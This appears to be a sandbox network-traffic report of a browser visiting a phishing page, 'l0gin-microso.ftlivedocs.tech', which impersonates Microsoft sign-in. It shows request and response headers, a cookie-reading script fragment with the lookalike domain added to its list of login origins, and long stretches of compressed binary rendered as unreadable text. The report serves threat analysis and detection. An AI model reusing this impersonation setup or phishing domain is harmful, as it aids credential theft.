                                                                                                                              2024-10-04 13:11:13 UTC266INData Raw: 64 38 34 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 65 29 74 5b 73 5d 3d 65 5b 73 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 69 66 28 73 5b 6e 5d 29 72 65 74 75 72 6e 20 73 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 73 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 6e 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 65 29 2c 69 2e 6c 6f 61 64 65 64 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 73 3d 7b 7d 3b 72 65 74 75 72 6e 20
                                                                                                                              Data Ascii: d84<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return
                                                                                                                              2024-10-04 13:11:13 UTC1369INData Raw: 2c 65 2e 70 3d 22 22 2c 65 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 66 5b 53 5d 2c 73 3d 30 2c 6e 3d 65 2e 6c 65 6e 67 74 68 3b 73 3c 6e 3b 2b 2b 73 29 69 66 28 65 5b 73 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 76 61 72 20 65 3d 74 2b 22 3d 22 2c 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 6e 3d 30 2c 69 3d 73 2e 6c 65 6e 67 74 68 3b 6e 3c 69 3b 6e 2b 2b 29 7b 76 61 72 20 61 3d 73 5b 6e 5d 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 2a 28 5c 77 2b 29 5c 73 2a 3d 5c 73 2a 2f 2c 22 24 31 3d 22
                                                                                                                              Data Ascii: ,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1="
                                                                                                                              2024-10-04 13:11:13 UTC1369INData Raw: 20 6c 3d 7b 7d 3b 69 28 73 2c 53 2e 75 73 65 72 4c 69 73 74 2c 6c 29 2c 69 28 61 2c 53 2e 75 73 65 72 4c 69 73 74 2c 6c 29 2c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 2e 75 73 65 4d 73 61 53 65 73 73 69 6f 6e 53 74 61 74 65 29 2c 65 2e 75 73 65 4d 73 61 53 65 73 73 69 6f 6e 53 74 61 74 65 3d 3d 3d 21 30 26 26 28 30 21 3d 53 2e 75 73 65 72 4c 69 73 74 2e 6c 65 6e 67 74 68 3f 28 53 2e 74 69 6c 65 73 53 74 61 74 65 2e 68 61 73 53 74 6f 72 61 67 65 41 63 63 65 73 73 3d 32 2c 53 2e 74 69 6c 65 73 53 74 61 74 65 2e 74 72 61 6e 73 69 65 6e 74 53 74 61 74 65 3d 73 2c 53 2e 74 69 6c 65 73 53 74 61 74 65 2e 70 65 72 73 69 73 74 65 6e 74 53 74 61 74 65 3d 61 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 68 61 73 53 74 6f 72
                                                                                                                              Data Ascii: l={};i(s,S.userList,l),i(a,S.userList,l),console.log(e.useMsaSessionState),e.useMsaSessionState===!0&&(0!=S.userList.length?(S.tilesState.hasStorageAccess=2,S.tilesState.transientState=s,S.tilesState.persistentState=a):"function"==typeof document.hasStor
                                                                                                                              2024-10-04 13:11:13 UTC463INData Raw: 22 2c 22 68 74 74 70 73 3a 2f 2f 64 65 76 69 63 65 2e 6c 30 67 69 6e 2d 6d 69 63 72 6f 73 6f 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2d 70 70 65 2e 6e 65 74 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2e 6e 65 74 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 64 65 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 70 61 72 74 6e 65 72 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6e 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 63 68 69 6e 61 63 6c 6f 75 64 61 70 69 2e 63 6e 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 75 73 22 2c
                                                                                                                              Data Ascii: ","https://device.l0gin-microso.ftlivedocs.tech","https://login.windows-ppe.net","https://login.windows.net","https://login.microsoftonline.de","https://login.partner.microsoftonline.cn","https://login.chinacloudapi.cn","https://login.microsoftonline.us",
                                                                                                                              2024-10-04 13:11:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              44192.168.2.174981613.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:13 UTC666OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_qzvqnltrxpy99ajspyxbgq2.css HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Origin: https://l0gin-microso.ftlivedocs.tech
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:13 UTC781INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:13 GMT
                                                                                                                              Content-Type: text/css
                                                                                                                              Content-Length: 20414
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Wed, 03 Jul 2024 21:48:08 GMT
                                                                                                                              ETag: 0x8DC9BA9D4131BFD
                                                                                                                              x-ms-request-id: c49891cd-c01e-0043-4f1b-1252b5000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131113Z-15767c5fc55lghvzbxktxfqntw0000000c9000000000b79g
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:13 UTC15603INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 7d 6b 73 e3 36 b2 e8 f7 f9 15 5c a7 52 3b ce 4a 8c 48 3d 2d 57 52 3b 99 cc 26 3e 67 5e 35 33 d9 47 a5 52 5b b4 44 59 3c 43 89 ba 24 65 8f 57 47 ff fd e2 8d 06 d0 20 29 8f b3 d9 7b 2b 27 67 13 0b dd 6c 00 dd 8d 06 1a e8 06 be fe ea 0f c1 f3 62 77 5f 66 37 eb 3a 78 fa fc 3c 78 95 2d ca a2 2a 56 35 29 2f 77 45 99 d4 59 b1 0d 83 67 79 1e 30 a4 2a 28 d3 2a 2d 6f d3 65 18 7c f5 f5 d7 5f fd e1 49 bf fb ff 05 ef 3f 3c 7b f7 21 78 f3 97 e0 c3 8f 57 ef be 0f de 92 5f ff 08 5e bf f9 70 f5 fc 45 d0 99 ca 93 27 1f d6 59 15 ac b2 3c 0d c8 7f af 93 2a 5d 06 c5 36 28 ca 20 db 2e 44 ab d3 2a d8 90 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 f4 21 cf aa 9a 7c 74 9d e6 c5 5d f0 94 90 2b 97 c1 db a4 ac ef 83 ab b7 e7 61 f0 81 e0 16
                                                                                                                              Data Ascii: }ks6\R;JH=-WR;&>g^53GR[DY<C$eWG ){+'glbw_f7:x<x-*V5)/wEYgy0*(*-oe|_I?<{!xW_^pE'Y<*]6( .D*Y:ve?!|t]+a
                                                                                                                              2024-10-04 13:11:13 UTC4811INData Raw: e7 bc b1 e2 92 61 7d df b0 68 ac ab 2c aa b1 88 da cb c6 22 89 f4 a2 b1 42 53 1e da 58 e7 55 1e b5 fb a5 96 31 c6 85 9c 5c 95 58 0f 77 34 04 a7 bc ef e9 bc 62 55 e4 cb 9d 46 11 60 f2 34 8a 20 ba 0a e1 1d 2d b3 ba 41 d4 6a 33 50 25 58 6c a8 15 02 68 eb 56 83 ba b5 a0 21 5d f4 aa e1 60 30 5e 26 13 b7 4f 5a e3 0c 32 50 fb 10 40 6b 9f fc 5a d9 82 86 f5 c9 a7 ad bc 4f 0f 53 c6 3e 8f 75 ef 81 fb bb e5 60 13 bf d0 d1 86 c0 d4 70 43 60 72 bc 81 ca 0c ee 7b ca cd 06 61 90 56 01 34 34 b4 0d 0f 13 81 b8 e1 dc 70 52 d0 d3 64 f3 b6 df 8a 2c 1c d2 a7 e1 c5 ec 1c b9 2b 18 00 b1 42 22 26 de 7d 9d 59 8d 1f 8e 83 89 00 6e 65 8f 64 aa a2 fc c3 d8 65 70 5f b6 f7 9c 65 7e ea 83 9d 2c f7 31 10 e4 08 df ce 47 c4 df 33 f4 3c 40 c9 2e 2b 17 af 8a ce 37 c9 36 db ed 73 c6 5e f7 a6
                                                                                                                              Data Ascii: a}h,"BSXU1\Xw4bUF`4 -Aj3P%XlhV!]`0^&OZ2P@kZOS>u`pC`r{aV44pRd,+B"&}Ynedep_e~,1G3<@.+76s^


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              45192.168.2.174981813.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:13 UTC643OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_ELtAAt2Ya8ISGuc0PJcBKA2.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Origin: https://l0gin-microso.ftlivedocs.tech
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:13 UTC798INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:13 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 122193
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Wed, 04 Sep 2024 01:33:09 GMT
                                                                                                                              ETag: 0x8DCCC8188A08D46
                                                                                                                              x-ms-request-id: a6e6408e-701e-003f-0d12-103458000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131113Z-15767c5fc55dtdv4d4saq7t47n0000000cag00000000dqg6
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:13 UTC15586INData Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 7b 57 e3 48 92 38 fa ff fd 14 46 33 97 b6 1b 61 2c bf b0 45 ab 59 63 a0 8a 69 c0 0c 86 ea 9e a5 18 8e 2c a5 8d 1a 59 f2 4a 32 8f 31 de cf fe 8b 88 cc 94 52 b6 4c 55 cd ee b9 f7 dc 73 e7 51 58 99 91 af c8 c8 c8 88 c8 c8 c8 bd 9f b7 fe af d2 cf a5 dd ef ff 4f 69 78 d3 bb be 29 0d 4e 4b 37 9f cf ae 8f 4b 57 f0 f5 8f d2 e5 e0 e6 ac 7f f2 fd f5 60 a3 f8 ff 9b 47 2f 2e 8d 3d 9f 95 e0 ef c8 8e 99 5b 0a 83 52 18 95 bc c0 09 a3 59 18 d9 09 8b 4b 53 f8 37 f2 6c bf 34 8e c2 69 29 79 64 a5 59 14 fe c9 9c 24 2e f9 5e 9c 40 a1 11 f3 c3 97 52 19 aa 8b dc d2 95 1d 25 6f a5 b3 ab 4a 15 ea 67 50 9b 37 f1 02 28 ed 84 b3 37 f8 fd 98 94 82 30 f1 1c 56 b2 03 97 6a f3 e1 23 88 59 69 1e b8 2c 2a bd 3c 7a ce 63 e9 c2 73 a2 30 0e c7 49 29 62 0e
                                                                                                                              Data Ascii: {WH8F3a,EYci,YJ21RLUsQXOix)NK7KW`G/.=[RYKS7l4i)ydY$.^@R%oJgP7(70Vj#Yi,*<zcs0I)b
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: 5a 40 01 48 3f 65 7e fe 9d 70 17 86 b2 5a 68 c6 d8 53 99 2b af 38 61 68 21 9b ce f0 76 06 77 2f b1 8a f6 1c e0 29 00 38 c8 06 c3 b2 0a 2b df 30 39 1d 64 f6 0d 4f 7a e2 7e 34 6d 3a 9a 00 0c 34 01 08 95 1f a4 6f 71 e1 37 9b b1 78 a5 1c ea ef e8 81 02 0a d3 b1 1d 3d 65 57 f3 d1 f7 33 e7 1d 77 84 3e 5b e4 6f 88 37 0e 56 73 7f 47 df 2d 25 77 ad 3e cb 46 b1 09 fd 59 e9 9a c6 25 5e 69 86 3d a4 ea 02 54 96 92 e8 0a dd c2 1a 8f 36 b8 e8 31 2b aa 16 b9 42 96 2b 1f f5 5b f8 9d e1 36 fa d1 00 84 23 1a 82 2d d1 a8 e4 55 1d 39 d3 31 2c 3a 0c 18 07 db b4 66 53 10 09 0c e7 b8 eb e1 00 b8 8f 67 e8 6b fa e2 d9 63 2f 68 1b f4 cd 05 5f 49 5f d2 84 a2 d5 ed ad f3 4c d4 f3 44 d8 0b 44 4c 5c 78 f3 82 ab 26 01 e4 a3 c7 f5 32 bb 60 81 8c 06 67 3a 21 1f 45 b4 1c 02 ad c9 fa cc a4
                                                                                                                              Data Ascii: Z@H?e~pZhS+8ah!vw/)8+09dOz~4m:4oq7x=eW3w>[o7VsG-%w>FY%^i=T61+B+[6#-U91,:fSgkc/h_I_LDDL\x&2`g:!E
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: 77 01 ab 86 93 13 0d e2 04 ad c1 bb 90 2b c3 9b df 13 1b 27 31 62 9a df 88 b4 22 90 79 9f bc 0f 9c 27 11 fb 1f b8 72 a6 d3 af de 87 e3 dd 83 c3 37 64 0e c5 fd 5c 9d 61 05 a8 a8 c7 32 2f 55 dd 9b 53 55 9e d8 44 8b 91 7e 0a 94 60 d1 1a 25 3d 4c a7 67 62 6e 14 d4 3d c4 dd 94 09 78 03 83 b1 98 8c 98 fa 44 64 c2 09 39 8c 7b 11 12 01 b7 84 d2 68 0b 3f 42 3a 43 9e 37 ea 66 1f 11 96 d2 99 0b de 60 31 6c 06 7e 1f 60 2f e5 2b 1b 5c 43 6a dd 95 0d ee cc 69 5c a5 09 1f 25 9d b5 6c f7 bc 62 11 b4 c2 84 82 a9 45 99 57 f5 2c 9d e8 c5 38 e0 86 3e a7 79 15 8b 8b 56 aa 40 4d 64 ec bc 31 ab ab 6d 1e 6e 1b c3 dc 45 ef e1 4c 03 88 3c c8 3e b0 fe 39 35 52 5e c9 79 43 d9 d1 ca d5 54 a3 b6 ee c4 5d a8 6b 63 07 30 7d a6 73 b4 dd 65 ba 72 a1 7a df 6c a7 fe fe d6 5e 4e e4 90 95 6e
                                                                                                                              Data Ascii: w+'1b"y'r7d\a2/USUD~`%=Lgbn=xDd9{h?B:C7f`1l~`/+\Cji\%lbEW,8>yV@Md1mnEL<>95R^yCT]kc0}serzl^Nn
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: 30 09 f5 14 35 60 ce f2 fe e8 1a b9 e3 49 f2 26 1c 0f 1f 45 ee 29 dd dd b3 30 20 25 b2 3c 1f 46 65 59 b4 27 33 de a0 d8 84 6d 8d 13 e9 7b 19 fd 2c 29 1a f9 07 fb 09 37 13 1e 81 af e3 38 d7 1a 8a bf c1 36 cf d0 b6 42 7c 9d 14 e0 d0 ef c9 18 43 4d c5 77 71 59 77 8e 86 e0 a6 ee b8 6d 25 93 bb 6e 34 d6 c5 bd 30 36 1f 71 7d 0a 29 8b 9e fd d3 20 11 52 2b a4 a9 df a3 6b 09 78 22 6a b0 e5 b4 03 2f 7f 92 e6 f1 e0 f1 f3 4d 94 b0 19 60 76 9a a7 23 28 93 76 42 3f c6 88 36 5d bb 46 a9 01 63 8f b8 42 99 64 e6 92 d1 19 60 eb 35 2a 5c 4d f2 80 57 d1 4d fa 51 56 f9 b1 c1 12 09 54 6e 43 94 2a ec a1 e3 f3 ac 01 44 68 83 84 57 8d 1f d1 6f d0 8f 2e e0 09 bd 70 82 4f 6d de 88 b3 06 4a 70 95 cf 7f 44 bc d8 56 9c 5a 0d 87 8d 74 00 d3 43 f9 aa 30 27 f7 48 f1 e7 7d 97 ec 41 df 0b
                                                                                                                              Data Ascii: 05`I&E)0 %<FeY'3m{,)786B|CMwqYwm%n406q}) R+kx"j/M`v#(vB?6]FcBd`5*\MWMQVTnC*DhWo.pOmJpDVZtC0'H}A
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: 92 03 92 9f b2 90 ac b0 72 18 98 1e 26 58 4c 56 0d f0 06 7e 5a ea ad 15 59 17 96 6f 16 b5 36 49 01 f9 99 3e cf 46 45 9c df 70 be 0d 1e 85 fe 33 ed 87 06 bf 78 64 42 a2 03 be a2 0f 92 e1 4a 73 fa 08 1a 35 fe 39 bf 8e 9c 9a 34 94 48 08 3d 8d b1 ad 19 96 66 3b 2a ab ae 60 84 ac bf 74 3a b2 04 69 0e a4 71 ea 6c 6a f6 bc a2 fa 6a e1 19 28 41 f3 40 09 7f 2b b7 21 10 05 39 0d 1d 7c e6 ed f6 2e 69 dc 7f 12 45 d1 08 f8 1d b0 cb 41 22 66 e0 e6 cc 3b 69 60 1c 9a 87 30 93 c0 11 da 2c 85 94 58 61 06 19 8a 3d 84 c3 a8 44 19 66 35 9d e2 26 23 96 13 55 97 30 19 53 44 9b 78 fa 7c 5f ca ac 66 f2 68 83 f3 b8 08 91 50 70 67 01 e8 36 d0 56 81 59 a7 1e f1 da 42 be c7 d0 f5 cb a1 83 f4 1b 8c 78 5c 7d a4 db 2b 40 c2 64 41 45 d3 8e 38 d9 b4 4d 48 3b 4f 45 41 18 a2 c3 86 1a c5 b9
                                                                                                                              Data Ascii: r&XLV~ZYo6I>FEp3xdBJs594H=f;*`t:iqljj(A@+!9|.iEA"f;i`0,Xa=Df5&#U0SDx|_fhPpg6VYBx\}+@dAE8MH;OEA
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: 18 b5 fc df b9 b3 94 45 81 eb 67 71 e4 c5 d2 96 22 49 58 94 cb 4c b0 28 ce 61 62 f1 fc 6e 96 f3 6a 37 35 07 4d 19 90 0e 36 3a f0 0d 9c 2a 81 1d 2d 19 4f 04 de 40 c0 62 26 f7 83 e6 5e 0a 2c 13 20 cd dc e3 81 4c 30 87 8e 93 db 32 0b 5c 91 c7 5e 1e 7a fb c1 bd 9a e3 a7 7e 22 5d df 49 b8 cb 58 2c 3d c7 97 b6 cd 93 2c 70 02 11 db 98 d7 fd 90 93 9f 3a 09 d8 4d e0 fb 22 4f a2 38 08 12 4c 58 96 44 61 92 24 79 c0 c1 25 f6 d2 4d 2d a1 52 1b 24 94 3b ae 00 c5 e6 5e 62 fb 89 1b 78 18 4e 90 88 3c b0 59 76 37 ef d3 5a 67 69 ec 70 16 b9 3c 70 d5 bf be c7 38 88 2a 89 73 df 06 52 38 ee dd 1c 76 ab dd 84 86 47 64 11 b8 76 9e 81 ab 4a 3b b4 c1 29 64 ec 05 22 64 36 13 3e 8f f7 43 bc 61 9a f0 50 d8 e0 a2 b6 90 49 06 8e 0a 36 94 83 b5 63 f1 42 3f 12 c1 7e ba 89 0c ee b9 81 88
                                                                                                                              Data Ascii: Egq"IXL(abnj75M6:*-O@b&^, L02\^z~"]IX,=,p:M"O8LXDa$y%M-R$;^bxN<Yv7Zgip<p8*sR8vGdvJ;)d"d6>CaPI6cB?~
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: 12 cf 7f 7a f2 a0 8f d8 ea d9 9b bf ec dc 0e b2 86 d1 dd cf 1b 69 ae d2 87 20 3b f3 54 bf dc e8 39 98 92 df 9b e9 ad fa 56 bd f6 87 4d fd d5 09 2b 7f 60 b4 19 bd 5c 57 63 fe 76 e1 f8 44 e1 4d eb 56 ce cf ca 85 e1 99 6b 46 fe fa e7 2f c7 e3 f0 f9 bc 2a 5f a6 2f 43 db cb df 2e 09 6d 93 6d fc ed 27 a8 4e 67 a6 55 fb 42 bd 32 7c f9 79 ff 5e 15 95 06 f7 79 b3 cf de f6 6c d6 2f ff de 4c d0 b2 e0 66 95 e4 1b c6 df 68 75 5a 49 b2 b6 4b 7e 29 f3 3b 45 7e 35 f5 e6 d3 86 c8 49 f5 b7 f9 e3 52 c8 e7 05 26 bd de 5c da c9 00 69 9a fb 8d 94 9f 7f 52 40 81 90 87 74 8b d8 97 a5 ff fc 53 cd cc 93 55 2e bc 7c 7d 07 9a df 99 8e ee 84 bf bf be 46 ad 7d da 44 8b bf 2a 5a 69 99 a1 14 ea 2f 0c 99 ee a4 4c cf 2a 96 cb f4 2e 3a 75 5d f5 ee aa f5 ae aa eb dd 94 bb a2 7a c9 2e 49 ce
                                                                                                                              Data Ascii: zi ;T9VM+`\WcvDMVkF/*_/C.mm'NgUB2|y^yl/LfhuZIK~);E~5IR&\iR@tSU.|}F}D*Zi/L*.:u]z.I
                                                                                                                              2024-10-04 13:11:13 UTC8303INData Raw: 60 d5 08 91 5e b1 44 5d 0b 2d 94 1e 42 c1 d7 11 0b b1 0e 2a 15 3c 8f e9 63 3a 55 74 59 09 2e b5 00 1f e3 aa bd 03 35 07 6f 63 52 84 e7 2f 6d 92 c1 e9 10 89 6f ae 45 64 ba b3 43 a5 af 97 81 17 65 a6 74 2d 26 19 e0 80 9e a0 b0 1d df 68 09 61 20 c0 85 83 29 61 48 2a cd e5 cf 7e 0c d2 57 4b 07 9f 78 e2 49 14 5d ce 09 3e 99 f3 27 2f 6d 97 38 30 1e 7c b6 e4 cf 4e 38 0a 33 4c d5 40 bd e9 d0 e1 50 24 7f 1e c3 bf b1 06 0f 4e 81 10 48 7c 90 24 91 1b 20 ed 03 48 60 11 18 c0 df 52 33 97 8f 0d 06 a7 3c 12 12 8f 96 45 c9 f6 12 df 00 07 55 bc 63 54 71 cd 81 80 87 c9 0c c9 f0 fc 90 cd e8 24 9c df 9c 84 58 fe 14 b4 11 18 8c a3 2c 8c d0 3b 09 05 72 21 3d 3f 79 c2 e0 8a 58 f5 91 88 53 0a 1e 03 57 fb 24 b5 72 e2 fb 78 24 c9 09 e7 35 b1 e3 10 7d 02 b4 2b ba f2 ef 43 7b 99 5e
                                                                                                                              Data Ascii: `^D]-B*<c:UtY.5ocR/moEdCet-&ha )aH*~WKxI]>'/m80|N83L@P$NH|$ H`R3<EUcTq$X,;r!=?yXSW$rx$5}+C{^


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              46192.168.2.174981713.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:13 UTC662OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Origin: https://l0gin-microso.ftlivedocs.tech
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:13 UTC791INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:13 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 16326
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Tue, 27 Aug 2024 20:17:04 GMT
                                                                                                                              ETag: 0x8DCC6D537C7BF24
                                                                                                                              x-ms-request-id: 7f0ef5b1-b01e-0004-6fab-0f39ee000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131113Z-15767c5fc55gs96cphvgp5f5vc0000000cc000000000ku2x
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
